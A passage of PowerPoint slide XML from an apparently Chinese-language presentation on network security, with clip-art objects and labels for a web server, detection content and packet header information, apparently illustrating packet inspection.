          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9028562" y="6176056"/>
            <a:ext cx="1758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latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>网络服务器</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="187" name="Object 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{886928C0-8B36-CBAA-F353-CBA4FE0484D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5718320" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6367" name="Clip" r:id="rId24" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId24" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="187" name="Object 111">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{886928C0-8B36-CBAA-F353-CBA4FE04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8320" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="188" name="Object 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC24AB27-0290-DF28-48CE-7D1F93674F65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6023120" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6368" name="Clip" r:id="rId25" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId25" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="188" name="Object 112">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC24AB27-0290-DF28-48CE-7D1F93674F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3120" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="189" name="Object 113">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36427799-BCB5-30D2-E5B0-1AAECA9AA1A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6327920" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6369" name="Clip" r:id="rId26" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId26" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="189" name="Object 113">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36427799-BCB5-30D2-E5B0-1AAECA9AA1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7920" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="190" name="Object 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F675740C-5C2D-07DF-B4C5-7C5FDEC8A3F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6556520" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6370" name="Clip" r:id="rId27" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId27" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="190" name="Object 114">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F675740C-5C2D-07DF-B4C5-7C5FDEC8A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6520" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="191" name="Object 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A65D918-63C9-D379-78AC-BF88A3E9AEB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6861320" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6371" name="Clip" r:id="rId28" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId28" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="191" name="Object 115">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A65D918-63C9-D379-78AC-BF88A3E9AE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1320" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="192" name="Object 116">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{226CF2DC-F6E0-5B2A-B74F-60BC640030E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7166120" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6372" name="Clip" r:id="rId29" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId29" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="192" name="Object 116">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{226CF2DC-F6E0-5B2A-B74F-60BC640030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6120" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="193" name="Object 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260B5AEA-6816-E65A-484C-95171B4D69A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7470920" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6373" name="Clip" r:id="rId30" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId30" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="193" name="Object 117">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{260B5AEA-6816-E65A-484C-95171B4D69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0920" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="194" name="Object 118">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EAC2B1-4456-416B-A6FC-B73C9AED0CE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7775720" y="5807391"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6374" name="Clip" r:id="rId31" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId31" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="194" name="Object 118">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EAC2B1-4456-416B-A6FC-B73C9AED0C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5720" y="5807391"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="195" name="Object 119">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC06213-D725-E0DC-9503-5123A1B826CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8080520" y="5629969"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6375" name="Clip" r:id="rId32" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId32" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="195" name="Object 119">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC06213-D725-E0DC-9503-5123A1B826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0520" y="5629969"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="196" name="Group 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37BDC972-AD0B-0390-11C2-9DABE7306F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4753105" y="3945805"/>
            <a:ext cx="1597376" cy="1030781"/>
            <a:chOff x="1362" y="1200"/>
            <a:chExt cx="1326" cy="919"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="197" name="AutoShape 67">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95B6E1D5-A8F8-042F-C29E-BD16706B7652}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="10800000" flipV="1">
              <a:off x="1632" y="1200"/>
              <a:ext cx="1056"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0 w 21600"/>
                <a:gd name="T19" fmla="*/ 3150 h 21600"/>
                <a:gd name="T20" fmla="*/ 1843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60" y="9989"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16752" y="6787"/>
                    <a:pt x="14027" y="4388"/>
                    <a:pt x="10800" y="4388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7258" y="4388"/>
                    <a:pt x="4388" y="7258"/>
                    <a:pt x="4388" y="10800"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="10800"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="4835"/>
                    <a:pt x="4835" y="0"/>
                    <a:pt x="10800" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16236" y="0"/>
                    <a:pt x="20825" y="4041"/>
                    <a:pt x="21513" y="9434"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24191" y="9092"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19955" y="14565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14482" y="10330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17160" y="9989"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="198" name="Group 68">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73C079B6-863F-46BB-4B9F-DD222FBD62B4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1362" y="1440"/>
              <a:ext cx="798" cy="679"/>
              <a:chOff x="528" y="1056"/>
              <a:chExt cx="798" cy="679"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:graphicFrame>
            <p:nvGraphicFramePr>
              <p:cNvPr id="199" name="Object 120">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A278382-DD4E-24E5-DC24-B47F5CB23996}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGraphicFramePr>
                <a:graphicFrameLocks noChangeAspect="1"/>
              </p:cNvGraphicFramePr>
              <p:nvPr/>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="528" y="1056"/>
              <a:ext cx="798" cy="612"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
                <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                  <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                    <p:oleObj spid="_x0000_s6376" name="Clip" r:id="rId33" imgW="1270571" imgH="967141" progId="">
                      <p:embed/>
                    </p:oleObj>
                  </mc:Choice>
                  <mc:Fallback>
                    <p:oleObj name="Clip" r:id="rId33" imgW="1270571" imgH="967141" progId="">
                      <p:embed/>
                      <p:pic>
                        <p:nvPicPr>
                          <p:cNvPr id="199" name="Object 120">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A278382-DD4E-24E5-DC24-B47F5CB239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1056"/>
                            <a:ext cx="79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 name="Text Box 70">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF2BBBD-BB48-552D-434C-4CE14CF2EA8E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="720" y="1104"/>
                <a:ext cx="461"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latinLnBrk="0">
                  <a:spcBef>
                    <a:spcPct val="0"/>
                  </a:spcBef>
                  <a:buClrTx/>
                  <a:buFontTx/>
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="4000" b="1">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="+mn-lt"/>
                    <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  </a:rPr>
                  <a:t>X</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Text Box 71">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2091A65-0AE1-DC5F-B78C-8EE186865646}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="845604" y="4116850"/>
            <a:ext cx="2566335" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>检测内容：         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="auto">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>包头信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
